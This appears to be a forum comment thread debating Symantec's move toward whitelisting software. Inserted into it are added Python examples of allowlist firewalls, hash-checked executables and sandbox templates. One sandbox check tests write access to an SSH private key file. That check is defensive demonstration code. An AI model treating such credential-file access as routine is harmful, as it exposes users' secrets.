Internet Security Moving Toward 'White List'
ehud42 writes "According to Symantec, 'Internet security is headed toward a major reversal in philosophy, where a 'white list' which allows only benevolent programs to run on a computer will replace the current 'black list' system' as described in an article on the CBC's site. The piece mentions some issues with fairness to whose program is 'safe' including a comment that judges need to be impartial to open source programs which can change quite rapidly. Would this work? The effort to maintain black lists is becoming so daunting that white lists may be an effective solution."
I'm all for this idea. We're counting Flash and Javascript as external programs too, right?
My Internet security philosophies have always been drop 'em all, let iptables sort 'em out!
They're using their grammar skills there.
I bet Vista gets on the whitelist. Whitelist RIP
Sounds to me more like a scheme to squeeze money out of software producers: "Give us teh money if ya wants yer program whitelisted."
New mod option wanted: -1 DrunkenRambling
Can someone send me a list of all IPv4 hosts which are not malicious? k thanx bye.
PS. please can you also send me an update whenever a new machine is compromised?
"It doesn't cost enough, and it makes too much sense."
A lot of the work my computer does for me happens via Google's Javascript. Will I have to whitelist it all over again every time the gmail implementation changes? If it's whitelisted by domain, then you still have to protect against cross-site scripting attacks somehow (all hail NoScript!)
The whole idea of a program being a quasi-static executable installed locally is starting to seem quaint.
Or is this going to really screw small-scale Windows developers?
Seems to me to be a blatant attempt by the big boys to lock users into their software (or software from companies they have an arrangement with). Since the majority of users probably won't know how to disable this 'feature', they will have less choice, and therefore higher costs.
If we can put a man on the moon, why can't we shoot people for Apollo-related non-sequiturs?
Why? Because AV vendors want your money.
With a whitelist, the user clicks 'Accept' for everything he runs. Then he's protected until he installs something else.
Blacklists are great since they require yearly subscriptions.
isn't the flip side of this that now you're only allowed to run approved programs on your computer? Only IE is approved for web browsing, only MSN Live is approved for instant messaging. I know that I, for one, welcome our corporate overlords.
White lists have been proposed since the beginning of time - from web filtering to spam prevention, and now to malware prevention - and they all suffer from exactly the same problem, which is the fact that humans are not all identical clones of each other, and neither consume information in the same way, nor communicate with others in the same way.
Commodore 64, Loading up the dance floor!
This application has not been signed by Microsoft. Do you want to run this application? Yes/No
Are you sure you want to run this application? Yes/No
Are you really sure you want to run this application? Yes/No
I mean, if it's not Microsoft, it's not really "official", what makes you sure you should be running this application. You probably shouldn't. There's a nice Microsoft alternative which is "official". Wouldn't you like to download that instead? Yes/No
Deleted
anyone has ever suggested about computer security.
"A week in the lab saves an hour in the library"
Certificates were intended as a white list: you protect the submitted data and have certificate from a central authority that this is indeed the company the certificate says it is.
We know how this ended (certificates given left and right without proper verification).
Now they try again with new certificates, which are more expensive.
So that's about that part.
What about site filters. Whitelisting sites in security suites has got to be the dumbest idea I've heard in a long time. Last I checked there's like billions of pages out there, some of which safe and some not.
So now that we find it impossible to cover the entire subset of malicious pages, what do we do? Yes, we try to cover the even greater subset of legal pages.
This will either end with many small harmless sites filtered out, or sites having to pay ransom to all security suite vendors out there to get whitelisted or something of a similar nature.
Not happening.
Take me for example. My open source software has a tiny number of users, being very specialised, and I'm not alone in having this class of software. We can't all be Apache developers. How will people like me get their program approved? Is it going to cost money? That's what I want to know.
I'd be interested in knowing how they deal with the fast release cycle of open source software (excluding mine, oh for a 48 hour day...).
I'm pretty keen on the whitelist idea though. If nothing else it'll make malware more inventive, they'll start imitating the fingerprints of validated software.
This is not a new idea, and many have talked about it before
Really, black lists were a bad idea from the start. Usually, the programs people want to run on a computer will remain fairly static, with perhaps a few changes when they update or find something online that looks interesting.
I'm sure there must be some security software that uses whitelists already. Does anyone know of any free ones?
The Internet in general terms started moving in this direction years ago when people started to configure their firewalls to block everything and allow only what you need through. Previously it was reasonably common practice not to have a firewall at all - or if you did, all it did was block against things which were known to be malicious.
It is a lot of work to maintain any whitelist of any significant size. But the reason you do it is because it's a lot more work to maintain any blacklist of any significant size, and even more work still to clear up the mess after something slips the net.
I think residential ISPs will be the first - I'd be surprised if it was even possible to connect outside your own ISP's network. Email through their SMTP server, web access through their proxy, sucks if you want any other service your ISP doesn't provide. Some of the more expensive ISPs may set up some sort of "sign a disclaimer and we'll let you do anything, but we reserve the right to pull the plug if we see so much as a single malicious packet" system.
A whitelist of torrents would help the college I work at. It doesn't make sense to block torrenting per se, but they have no (legal) choice. As more and more big downloads become available via torrent, I hope we'll see the third-party security companies offer content filtering on this basis.
Once we whitelist all legit programs, we only have to blacklist the legit programs with injected code (via open source or assembler hacks) and we're done!
Amazing!
Or will security suites actually have to whitelist every single modification of the program? Will I be locked out of my HelloWorld.cpp program as soon as I compile it?
and folks are used to anti-virus software routinely blocking stuff that's not on the list, it'll be a real easy step for TPC hardware to start blocking execution of all non-whitelisted software, including all FOSS and anything else Microsoft chooses not to sign. Microsoft's stranglehold will then be complete...
My home pc's Symantec firewall already has a whitelist. The first time an application tries to use the internet, it gets in the way to check. If the program's size/date changes, it does it again.
This makes the fix-compile-test-fix cycle on a simple net client application just a little harder, since each time I run a new build, the firewall comes up all over again. Not to mention that by the time I clean it out, the whitelist contains 30+ records of old builds, and the UI to that list sucks dead donkeys through a straw.
Do this on a developer box for all apps that don't access the internet? Ouch. I can see it working for my uncle's email and web machine, maybe, kind-of.
My Karma: ran over your Dogma
StrawberryFrog
I would like to see an OS that maintains
several rings (concentric circles) into which programs can qualify
through increasingly rigourous standards and testing as they
get closer to the central core ring of software.
So essentially this OS would have a core ring of whitelisted and essential
programs. Just outside this would be a 2nd ring of whitelisted but
optional programs.
Then a ring of "grey listed" (reputationally vouched for, for both security
and usefulness and quality)
Followed by a "wild west" outer ring.
The OS would be designed so that programs in a more outer (less trusted,
and less essential) ring, could not have any access to the memory or disk
areas of more inner programs, and could only ever use the services of inner
programs through narrow public interfaces supervised by the OS.
Where are we going and why are we in a handbasket?
For instance, users in a corporate environment where setups are exactly defined and IT can check out in advance what works.
/. crowd: forget it, the whitelist will annoy you more than it helps ;-)
For a private user with a mostly static set of applications, it should still work, but expect the occasional blocked program.
For developers and the rest of the
C - the footgun of programming languages
This leads to the conclusion that all other "security" companies were either in bed with Sony, or that their "security" products are utterly useless. I'm not sure which is worse.
So why again should I give a rat's ass about the opinion of those guys when it comes to security?
I am the musician
with a pocket calculator in my hand
Kraftwerk
Exactly. Developers are probably users that can run a machine that has very user-configurable security parameters. Most PC users use email/web. The more advanced users use email/web/games, so have a secure environment for email/web and an OS that sandboxes the other apps on top of that. So for the non-developers, have a configuration that is safe and hard for the user to circumvent, and then also have a developer edition.
...execute permissions and mandatory access control, yeah?
Now where have I seen this before...
Any vulnerability that allows dropping and launching unwanted executable code must surely also allow editing any whitelist. And all those vulnerabilities MUST be in existing white-listed software. This is shutting the door after the burglar is inside. It doesn't help.
From TFA: A "white list" would instead compile every known legitimate software program, including applications such as Microsoft Word and Adobe Acrobat, and add new ones as they are developed.
And what hoops does a small software developer have to jump through to get Symantec to put his program on their white list?
Negative moral value of force outweighs the positive value of good intentions.
I think people should look at the big picture before taking this too seriously as a security measure: Programs only run on a system if they are either started by the end-user, or started by some other code on the system which has explicitly allowed that program run. Put another way, the current first line of defense is a 'white-list' like approach where processes only run when they are allowed to run.
The problem is that there are lots of people / large software monopolists in the world who don't know how to code well, and this creates security flaws which cause this authorised code to do things on behalf of other code, including possibly executing arbitrary code.
This code is then theoretically built on top of a kernel which attempts to restrict what the code can do even if it is executed (of course, often there are flaws here too, and often the exploited code is run with more privileges than it should have, so the entire system can be compromised).
Virus scanners and other security software of this kind are supposed to provide an extra, reactive layer of defense on top of the existing proactive measure for anything which slips through the cracks. Suggesting that they be turned into another white-list is therefore not a logical suggestion, and implies that they are not being entirely honest:
* They might just want to create hype to utilise unsuspecting journalists to sell more of their products for them.
* Perhaps this is part of another Digital Restrictions Management style plot to take the decisions of what runs on computers from computer owners and give it to some central pseudo-authority so they can (mis)use the power for their own purposes.
X-Has-Sig: yes
I've been using whitelists for years now. Kerio Personal Firewall does it for me on Windows, but I'm sure most of the other firewalls also provide these features:
*) Whitelist ALL internet connections, mark networks as "safe" or make advanced rules for IP traffic
*) Stop any new program from running until approved. Checking signature, date, filesize and filename.
*) Various web-filters etc., but I don't use the pay-version so they disable themselves.
Of course, this won't stop ignorant users running "Britney screensavers" and what not, but should be secure enough for me.
Java apps for cellphones need to be signed to get access to certain onboard services. Last I checked this costs on the order of 500USD/year and I doubt that it involves any actual tests.
Even the owner of the phone can't sign applications which he himself wrote and wants to install on his own device. Eg on my Nokia 6230i I can allow my apps to access the memory card, but only after closing a dialog at each read/write-attempt. Only a signed application has unlimited read/write access, etc.
Although this is a relatively new area, there are already some experts emerging in the field. I came across these guys, who recently published this article on the subject. The article talks about the loss of control by IT of the desktop, and how people are now trying to use software to regain control.
AG
It won't just be "you're on the list, welcome to the party" but access to each resource will be given only if that particular access is whitelisted.
You already see this in some security programs, where program A is white-listed for ports 80 and 443, program B is listed for ports 20 and 21, etc. etc. etc.
Eventually, this will be locked down even more. Program A may be whitelisted for port 80, but only for the purposes of self-updating or reporting bugs to its manufacturer, and only to a short list of domain-names or IP addresses.
Within a web browser, not only will add-ons like Flash and Java have their own restrictions, each add-on will have its own restriction. Java already implements a version of this for applets: an applet is supposed to be allowed to talk to home base but not much more.
I also see the rise of ordinary applications running in a full or lightweight VM, with applications in different VMs talking to each other over a virtual network rather than through shared memory or shared files. Rogue or compromised applications in a VM will be limited to what they can do, much like a chroot'd or BSD-jailed application, only more so.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
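The per-program, per-port, per-destination allowlist the comment above predicts ("program A may be whitelisted for port 80, but only for self-updating, and only to a short list of hosts") can be written down as a small default-deny policy. The following is an added example, not code from the original thread or from any firewall product; the program names, host names and connection attempts are all constructed.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class NetRule:
    """What one allowlisted program may do on the network."""
    ports: frozenset            # TCP ports the program may connect to
    destinations: frozenset     # host names it may reach; empty = any host


# Constructed policy: program A is allowed 80/443 only toward its own update
# and bug-report hosts, program B is allowed 20/21 toward any host.
# Anything not listed is denied (default deny).
POLICY: Dict[str, NetRule] = {
    "program_a": NetRule(frozenset({80, 443}),
                         frozenset({"update.example.org", "bugs.example.org"})),
    "program_b": NetRule(frozenset({20, 21}), frozenset()),
}


def decide(program: str, dest: str, port: int) -> Tuple[str, str]:
    """Return ("allow" | "deny", reason) for one outbound connection attempt."""
    rule = POLICY.get(program)
    if rule is None:
        return "deny", "program is not on the list"
    if port not in rule.ports:
        return "deny", f"port {port} is not allowed for {program}"
    if rule.destinations and dest not in rule.destinations:
        return "deny", f"destination {dest} is not allowed for {program}"
    return "allow", "matches an allowlist rule"


# Constructed connection attempts, as a host firewall might observe them.
ATTEMPTS: List[Tuple[str, str, int]] = [
    ("program_a", "update.example.org", 443),    # self-update: allowed
    ("program_a", "bugs.example.org", 80),       # bug report: allowed
    ("program_a", "tracker.example.net", 80),    # right port, wrong host
    ("program_a", "update.example.org", 25),     # right host, wrong port
    ("program_b", "ftp.example.com", 21),        # FTP to anywhere: allowed
    ("unknown.exe", "update.example.org", 443),  # not on the list at all
]


def audit(attempts: List[Tuple[str, str, int]]) -> List[str]:
    """One log line per attempt, so that denials can be reviewed later."""
    lines = []
    for program, dest, port in attempts:
        verdict, reason = decide(program, dest, port)
        lines.append(f"{verdict.upper():<5} {program} -> {dest}:{port} ({reason})")
    return lines


def denied_count(attempts: List[Tuple[str, str, int]]) -> int:
    return sum(1 for p, d, port in attempts if decide(p, d, port)[0] == "deny")


if __name__ == "__main__":
    for line in audit(ATTEMPTS):
        print(line)
```

The reason string matters as much as the verdict: when a whitelisted program is blocked because it suddenly contacts a new host, that log line is the signal a user or administrator needs to decide whether the program was updated or compromised.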
Would this work? The effort to maintain black lists is becoming so daunting that white lists may be an effective solution.
You see, a white list would be bigger than the black list. But how come then a black list is daunting to create, and a white one isn't?
Simple, they'll charge the legal software vendors to be white listed.
It's funny, laugh.. Hmm, no one is laughing.
Being a gatekeeper in a whitelist scheme is a great business opportunity:
After all, businesses would be willing to pay to get their products into said whitelist, while one hardly expects virus makers to pay for getting their creations into a blacklist.
Of course, I'm sure the Symantec guys are naturally not at all thinking of all those extra $$$
I just released version 421 of a scientific simulation model. The model is mostly of interest to our own students and research partners, but occasionally an unrelated Ph.D. student might try it out. So we distribute it from our home page. If any single version is downloaded by five people, that is unusually popular.
Should each version of this program be "judged" in order for others to run it?
There are zillions of these kinds of highly specialized scientific programs, and other branches have their own ad-hoc program with narrow but high impact utility. Vertical markets.
It seems to me that these white lists must come with user specified exceptions. Which basically means "allow this program to run" pop-ups. Which we already have in abundance in Vista, and thus are being conditioned to press "yes" for.
So nothing is really gained by white lists.
And it has always been a good idea, but whitelists should be personal, with distributed advice and combined with greylisting and blacklisting algorithms. That is to say, I want the OS, when it installs, to have a few things in userland whitelisted, but only when I install something can I add to the whitelist. You may throw in a bit of internet opinion, as in - 70% of users think that this program is OK and 0% of users think that this program is malware, or sandbox this greylisted program until I whitelist it in a month's time. Same for email really. I want whitelisted 'from' addresses only. Plus any greylisted stuff that consists of one line only. And no blacklisted stuff (of course).
Religion is what happens when nature strikes and groupthink goes wrong.
Indeed, the only possible "success" from the whitelist idea is that the Internet morphs into television (shudder).
Q: Where has the Internet failed?
A: Its main proponents and enthusiasts ignored Drivers' Ed for the info-superhighway. They didn't teach people how to use a web browser and email programs, didn't show how to read a URL and pay attention to the protocol and domain, nor instill the habit of mousing-over links to see where they go beforehand. Teaching people about the padlock symbol should have also included how to deal with SSL certificate alerts.
The result of this neglect is that people cannot recognize authenticity on the Internet, so the value of the Internet's "currency" is spoiling. Imagine if people weren't clued-in on how to authenticate a $20 bill: Over time only certain government and corporate entities would be trusted to handle currency to prevent spoiling by counterfeiters.
Our job as Internet cognoscenti is to keep correcting the people around us on the right way to use the Web and email. Granted, this is not a cure-all given the other major factor here (Windows malware), but it's several steps in the right direction. This stuff is not hard.
The alternative is an Internet-II re-worked around big corporations and government sites through a whitelist enforced by Trusted Computing remote attestation. Don't think they won't be opportunistic enough to scare the public into that corner.
According to Symantec, *Windows system* security is headed towards a major reversal in philosophy, where a "white list" managed by us, Symantec, will allow only benevolent programs that registered with us (for a small, very reasonable fee. No, really!) to run.
They have to find a new way to make money now that Vista broke their existing business model.
Every expression is true, for a given value of 'true'
Yes, because when I think "desktop application", I think "the file format parsers in this application are totally not vulnerable to complete and utter compromise, the effect of which would be the evasion of software restriction policies."
There is only one problem with this approach: once you install a white list, you no longer have a general computing device (short: computer), but an embedded device. You are limited in what you can do by what is on the list.
Developers will be the first to notice: you can still write and compile a program, but you cannot test it. But the typical user will also be affected: what about the useful firefox extension you like? Bummer, not on the list. Want to use facebook? Sorry, the javascript in the new version is not approved.
The white list is pretty futile anyway, because you can program on several levels. Javascript is only an example: what if the browser is approved, but your javascript code does nasty things? Or what about a heap overflow in the browser? Suddenly you are running custom code, but how is the white list going to notice this?
1: What kind of person even remotely interested in anything "Internet Security" would even consider dreaming about considering taking Symantec seriously?
2: Didn't we have this discussion not too long ago except the "List" would've been administered by MSFT (&co), called TCPA (then Palladium then NGSCB then OMGWTFBBQ) and be a little bit more "hardware-assisted"? (For anti-microsoft-fanboy coverage, check out AgainstTCPA, for msft coverage try Microsoft, Wikipedia has some rather neutral insights)
Because, you know, if software badly parses a file format, allowing code injection, it won't be safe anymore...
In a real business scenario, scripts, programs and macros are created to solve day to day problems. How do these get on the WhiteList? For the developers trying to test their work this becomes a true nightmare. At what point do you draw the line? VB 'macros' inside of Excel? Perl scripts? Batch/cmd files? Moving electrons?
Anyway, as pointed out in some other posts, the entire network would be at risk if a trusted application or host machine that is whitelisted gets infected or compromised.
You may be more right than some probably realize. See, whitelisting is essentially all that "trusted computing" was about.
Yes, "trusted computing" had all that DRM stuff and crypto signatures and all components authenticating themselves and their drivers, but essentially that's what you need to have a bullet-proof whitelist.
- E.g., if you don't have a strong hash to be sure that it indeed is the program you think you're running, and it's an untampered executable, then you don't really know what you're running. (E.g., if you were to do it just by name, and you allow, say, "WoW.exe", then you'll also run a virus attachment called "WoW.exe" just as cheerfully.)
- E.g., if you don't make the system startup itself bullet-proof, people will use spoof drivers and whatnot to compromise that security
So basically we're essentially back to the same Palladium shit that we ranted and raved against as the great Satan. It's what MS wanted in Vista in the first place, but apparently realized grudgingly that no one else wanted. And _of_ _course_ Vista would be on the list. In fact, better than that, Vista was supposed to be the one enforcing it. (Which, if you think about it, is pretty much needed. If the OS doesn't do it, and doesn't double-check its startup and components at that, any other link down the chain is not guaranteed enough to be uncompromised.)
So now it's snuck back under the same claim that you need it to protect you from the evil hackers. Right.
Well, the problems are the same any way anyone wants to slice it. E.g.,
- it essentially discourages running stuff you compiled yourself. (Just changing the options you compile a kernel with, for example, is enough to change the hash, if the hash is any good. So essentially the only safe thing a "trusted computing" system should conclude there is that the system itself has been tampered with and is no longer secure or trustable.)
- it places an undue burden on small time developers and hobbyists. I know if I was distributing a small utility on sourceforge, I'd be annoyed if I had to re-certify it every time I refactor something or fix some obscure bug. Doubly so if it costs anything to get it certified, which would likely be the case if a commercial entity is doing it. Getting it virus scanned, run through some automated heuristics, hashed, and put on the list, can take some time and infrastructure, and a paid employee's time costs money.
And, frankly, even if it was something as trivial as $10, why would I pay it for something that makes me no money? It'd be like ROI except without the R. And if you want it thoroughly dissected and certified that it 100% can't possibly be a virus, then it'll cost a heck of a lot more than that.
- it can be used to shaft you the other way around too. A program can authenticate the system it runs on, and some might even need to. (E.g., I sure hope an anti-virus utility pipes up loudly if it thinks it runs on a system where the OS itself has been compromised. E.g., I sure hope a banking applet pipes up loudly if it runs in a browser that's been compromised.) So there's nothing to keep someone from making a program that refuses to run in Wine or a flash applet that refuses to work in Mozilla.
And if you think no one other than MS would ever do that, think again. There was this recent story even on Slashdot about webmasters who explicitly don't want Mozilla users because they block their ads.
Etc.
A polar bear is a cartesian bear after a coordinate transform.
One thing I always liked about the FOSS/linux world is their package management. e.g. All I have to know is that I trust a certain repository maintained by OS developers/enthusiasts. As long as I am pulling apps from them (apt-get, emerge, yum...whatever), I know I am not getting screwed over (should also check MD5 or something, but usually quite automatic). If I have to use something very special that's not in the repository, then I do my own research (yeah, I know, most users can't be bothered with that).
How is this not essentially the same thing, except that Symantec wants to be the middle man and charge everybody for it? So how's this idea: instead of a white/grey/black list maintained by some large corporation, have some sort of app management program that, whenever an unknown executable runs, makes a checksum or hash or whatever and checks it against some wiki-ish site where users rate programs for trustworthiness. Surely malware writers can run some bot that boosts their rating, but it seems like a technically solvable problem.
Just some thoughts before some large corporation asks me to surrender control of my computer to them.
The only possible interpretation of any research whatever in the 'social sciences' is: some do, some don't
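Two earlier comments make the same technical point from different directions: the "trusted computing" post notes that allowing a program by name means a malicious file called WoW.exe runs just as cheerfully as the real one, and that a rebuild with different compiler options changes any decent hash; the repository post above wants an unknown executable hashed and checked against a list. The following added example (not code from the thread, and not any vendor's or distribution's tooling) puts a name-based check next to a hash-based, manifest-style check. The "executables" are constructed byte strings that all carry the same file name.

```python
import hashlib
import hmac
import json
from typing import Dict

# Constructed sample "executables": plain byte strings, not real software.
# All three would be saved under the same file name, WoW.exe.
GENUINE_WOW = b"MZ\x90\x00 constructed genuine game client v1.0"
IMPOSTOR_WOW = b"MZ\x90\x00 constructed unrelated program using the same name"
REBUILT_WOW = b"MZ\x90\x00 constructed genuine game client v1.0, rebuilt with other flags"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Name-based allowlist: all it records is a file name.
NAME_ALLOWLIST = {"WoW.exe"}

# Hash-based allowlist in the style of a repository manifest:
# file name -> SHA-256 of the exact bytes that were reviewed.
MANIFEST: Dict[str, str] = {"WoW.exe": sha256_hex(GENUINE_WOW)}


def allowed_by_name(filename: str) -> bool:
    """Weak check: anything that happens to carry the listed name passes."""
    return filename in NAME_ALLOWLIST


def allowed_by_hash(filename: str, data: bytes,
                    manifest: Dict[str, str] = MANIFEST) -> bool:
    """Strong check: the bytes must hash to the value recorded for that name."""
    expected = manifest.get(filename)
    if expected is None:
        return False
    # constant-time comparison, as for any digest check
    return hmac.compare_digest(expected, sha256_hex(data))


def verify_download(filename: str, data: bytes,
                    manifest: Dict[str, str] = MANIFEST) -> str:
    """Repository-style verdict for a fetched package file."""
    if filename not in manifest:
        return "not in manifest"
    if allowed_by_hash(filename, data, manifest):
        return "ok"
    return "hash mismatch"


def compare(filename: str, data: bytes) -> Dict[str, bool]:
    """Both verdicts side by side for one file."""
    return {"by_name": allowed_by_name(filename),
            "by_hash": allowed_by_hash(filename, data)}


if __name__ == "__main__":
    for label, blob in [("genuine", GENUINE_WOW), ("impostor", IMPOSTOR_WOW),
                        ("rebuilt", REBUILT_WOW)]:
        print(label, json.dumps(compare("WoW.exe", blob)),
              verify_download("WoW.exe", blob))
```

The impostor and the rebuilt binary get the same answer from the hash check, which is exactly the trade-off both comments describe: a hash-based list cannot be fooled by a file name, and for the same reason it cannot recognise your own fresh build until someone re-lists it. In a real repository the manifest itself must also be signed, otherwise an attacker who can replace the package can replace the recorded hash as well.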
I can see some immediate problems with trusting a list that says "you can only run these known safe programs":
Usage: km/h for speed (kilometers per hour); kph for very slow impulses (kilopond hours).
...That if people could start using more secure OSes, meaning more of the necessary apps get developed for said OSes, white, black, grey etc. listing wouldn't be needed. I think all PCs should have a sensor, which senses if a certain user is going to do something stupid, then knocks said user out with a blunt (and semi-soft) instrument, picks itself up and runs away. The bane of PC security is users doing stupid things. (This is coming from a guy who has just had to spend a day cleaning out RavMon from a bunch of Windows PCs because some schmuck tried to download some games over Limewire and thought Hitman: Blood Money really is only 5MB; somebody has to teach people how to pirate properly, since improper pirating spreads viruses.)
Frankly, I'm not all for this idea. It creates a cumbersome and abusable solution to something that was solved better already.
E.g., whatever happened to running something in a sandbox, ffs? You can go as far as running something untrusted (e.g., a plugin, ActiveX control, etc) in a virtual box, but even a chroot jail is a good start. It _is_ possible to isolate something to the point where it can't do any harm at all, and can't touch anything except itself. It's also possible to nice it to the point where it only runs when nothing else wants to, so it can't DOS your system that way.
So why doesn't anyone do just that already? E.g., MS could have fixed their own ActiveX crap that way ages ago. Instead we got this baroque, but fundamentally broken, model where you get to decide (or have decided for you based on zones) whether something can't run at all, or can run with full rights as an executable. Except if a malicious one slipped through the cracks, it's still a full executable running on your machine.
Heck, even Java is essentially the wrong way about it as a browser plugin. It tried to implement itself some restrictions which belong in the OS or browser itself, and if the JVM itself is compromised (there _have_ been a couple of JVM vulnerabilities), it can do anything. Kudos to Sun for trying that, but it's a workaround essentially. It shouldn't have been the JVM which does that, it should have been the OS and browser.
Whitelisting is just an extra step in that wrong direction, essentially. Instead of making sure that a malicious thing in the browser can't touch anything else, we're one step further in the baroque, fragile and monumentally work-intensive direction of determining which of them should be allowed. Except again, if something slipped through the cracks, you'll still get screwed so hard you'll walk bow-legged for a week.
Am I the only one who finds that dumb?
A polar bear is a cartesian bear after a coordinate transform.
The whole idea of a black list really doesn't work on large networks like the internet; there are probably thousands of PCs being compromised, and making new, not-yet-detected software is child's play. It's probably easier and less work to keep a white list instead... whether it's actually useful altogether is another thing...
It's already like this in the mobile environment, and it's a terrible pain for developers.
When making apps in Java/J2ME or Symbian (e.g. for Nokia nSeries), you need to have the client signed by a third party in order to use native resources like memory efficiently. While the signing process is not technically the same as a white list, it has similar consequences: you are hindered in successfully demonstrating your software for potential customers until some unknown person has expressed his subjective opinion about it.
I know because we make such an application right now, and during development we're screwed, as we can't get around these limitations even on our development devices. It's no good.
IF this idea catches on, real world developers need to test the god damn system before they enforce it on people.
As I've mentioned before, what would help would be sandbox templates.
;).
Basically a program requests the template sandbox it'd like to run in, and it runs in that sort of sandbox if the user has approved that before (or approves it now), or the program is signed by User Trusted Vendor X to run in that template.
Then even if the program is inherently evil or is exploited by some "save game" or other stuff, the program still can't break out of its sandbox.
In contrast, the problem with plain whitelisting methods is that if whitelisted programs like Mozilla/IE get exploited, they get to access the user's files, eavesdrop/keylog etc. Cynically, whitelisting of programs is just good for extending monopolies/oligopolies and control, and doesn't do that much for security.
And even worse are Vista UAC or other "Are you sure you want to allow this" schemes which effectively require the user to solve the "halting problem", except that instead of "will this program halt?", it's "will this program do something evil?". AFAIK the halting problem isn't solved, and so it's not reasonable to expect "Aunt May" to solve it.
It is more reasonable to train "Aunt May" to not click "Yes" when she sees "'Cute Frog Game' requests Full System Install Privileges allow Y/N" with the usual exclamation marks and red/striped backgrounds and scary warnings. And to only click "Yes" for "'Cute Frog Game' requests Guest Game privileges". In which case "Cute Frog Game" does not have access to the microphone, no network, and can only read stuff from a few places and write to even fewer places.
All this is not easy to do - because programs need read access to libs/DLLs etc, and you need to standardize file layouts, device, network access etc, and create a reasonable and manageable set of templates (custom templates should be allowed - esp templates signed by a trusted party, but if everything is custom it breaks down).
But the technology is already there - e.g. SELinux, AppArmor, but it needs more user friendly wrapping, cooperation from GUI/desktop, standards etc.
And it is possible - Microsoft could do it - they already have stuff like Local Settings and so on. Apple could too - they moved people from PPC to x86 etc.
I'm too lazy to go into the details on how it could work, so please fill in the rest of the blanks intelligently yourselves.
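The template scheme described above, written out as an added example (not the commenter's code or any real OS component): a program names the template it wants, and is admitted only if the user approved that exact program for that template before, or a vendor the user trusts for that template signed it. Templates, paths and keys are constructed, and vendor signatures are simulated with HMAC as a hypothetical stand-in for real code signing.

```python
"""Sandbox-template admission policy (added example, not the original post's code).
Vendor code signatures are simulated with HMAC, a hypothetical stand-in."""
import hashlib
import hmac
from dataclasses import dataclass, field
from typing import Optional

# Capability templates (constructed). Default deny: a program gets exactly what
# its template grants and nothing outside it, even if the program is exploited.
TEMPLATES = {
    "Guest Game": {
        "read": ("/usr/share/games", "/home/may/.games"),
        "write": ("/home/may/.games/saves",),
        "network": False,
        "microphone": False,
    },
    "Network Client": {
        "read": ("/usr/share", "/home/may/.config/chat"),
        "write": ("/home/may/.cache/chat",),
        "network": True,
        "microphone": False,
    },
    "Full System Install": {
        "read": ("/",),
        "write": ("/",),
        "network": True,
        "microphone": True,
    },
}


@dataclass
class Manifest:
    """What a program asks for: a template, optionally vouched for by a vendor."""
    name: str
    template: str
    code: bytes
    vendor: Optional[str] = None
    signature: Optional[str] = None


@dataclass
class UserPolicy:
    """The user's standing decisions: earlier approvals, and which vendors may
    vouch for which templates (a vendor trusted for games cannot grant installs)."""
    approvals: set = field(default_factory=set)           # (program_id, template)
    vendor_keys: dict = field(default_factory=dict)        # vendor -> HMAC key
    vendor_templates: dict = field(default_factory=dict)   # vendor -> {templates}


def program_id(code: bytes) -> str:
    """Identify a program by the hash of its bytes, so a changed binary needs re-approval."""
    return hashlib.sha256(code).hexdigest()


def vendor_sign(key: bytes, code: bytes, template: str) -> str:
    """Simulated vendor signature. It binds the program AND the template, so a
    signature issued for 'Guest Game' cannot be replayed to claim an install."""
    msg = program_id(code).encode() + b"|" + template.encode()
    return hmac.new(key, msg, "sha256").hexdigest()


def admit(m: Manifest, policy: UserPolicy) -> tuple:
    """Return ('run', caps, why), ('deny', None, why) or ('prompt', None, why)."""
    caps = TEMPLATES.get(m.template)
    if caps is None:
        return ("deny", None, "unknown template")
    if (program_id(m.code), m.template) in policy.approvals:
        return ("run", caps, "user approved this program for this template before")
    if m.vendor is not None and m.signature is not None:
        key = policy.vendor_keys.get(m.vendor)
        if key is None or m.template not in policy.vendor_templates.get(m.vendor, ()):
            return ("prompt", None, f"{m.vendor} is not trusted to vouch for {m.template}")
        if not hmac.compare_digest(vendor_sign(key, m.code, m.template), m.signature):
            return ("deny", None, "vendor signature does not verify for this code/template")
        return ("run", caps, f"signed by trusted vendor {m.vendor} for {m.template}")
    # The prompt names the template, not a bare yes/no, so the user compares
    # "Guest Game" against "Full System Install" instead of solving the halting problem.
    return ("prompt", None, f"'{m.name}' requests {m.template} privileges")


def approve(m: Manifest, policy: UserPolicy) -> None:
    """The user clicked 'Yes' on the prompt for this exact program and template."""
    policy.approvals.add((program_id(m.code), m.template))


def allowed(caps: dict, op: str, target: str = "") -> bool:
    """Runtime check inside the sandbox: anything outside the template is refused."""
    if op in ("network", "microphone"):
        return bool(caps[op])
    return any(target == p or target.startswith(p.rstrip("/") + "/") for p in caps[op])


if __name__ == "__main__":
    policy = UserPolicy(vendor_keys={"Vendor X": b"constructed-key"},
                        vendor_templates={"Vendor X": {"Network Client"}})
    frog = Manifest("Cute Frog Game", "Guest Game", b"frog-v1")
    print(admit(frog, policy))
    approve(frog, policy)
    decision, caps, why = admit(frog, policy)
    print(decision, allowed(caps, "write", "/home/may/.ssh/id_rsa"))
```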
Almost every program installed on this system is already in a whitelist of software known as a "repository" -- collections of software where (typically) the source code is available to all, tested, compiled and cryptographically signed so that I can be fairly confident the packages I install have not been tampered with. There are only five other packages I've installed manually, and even three of those are open-source and probably available from a repository somewhere.
Nice to see that the Windows world is trying to catch up.
455fe10422ca29c4933f95052b792ab2
My white list doesn't include Windows, which makes all of this go away!!
a) I see this as a great way of stifling innovation (while you may get a temporary reprieve from malware, until the malware begins breaking into your programs [e.g. via word-macros,... - or would we need to get macros added to the whitelist, too?])...
b) I see that this may end up in taxing innovation as well (if the whitelist was free, it could be fairly easily knocked out by everyone who hates it writing some small 'hello world' program and requesting their program to be put on the whitelist; if this should be restricted to network-only programs, make your own hello world translate the string 'hello world' on the fly via Google's translation service). This alone would force whoever organizes the whitelist to charge for any examination, if only to prevent themselves getting completely swamped in applications.
c) What are the political ramifications of this? Would you have one place in every country adding to the same global whitelist; or just one global whitelist? If every country has a place, how do you keep out corruption as a factor (say, bribing someone to accept a malicious program on the whitelist).... If there is only ONE, how do you make sure that this doesn't get abused for political purposes (i.e. we don't want an office program developed in China; they can use MS Office, which incidentally is on the list already)?
You think spam, virii and trojans are bad? This will be worse...
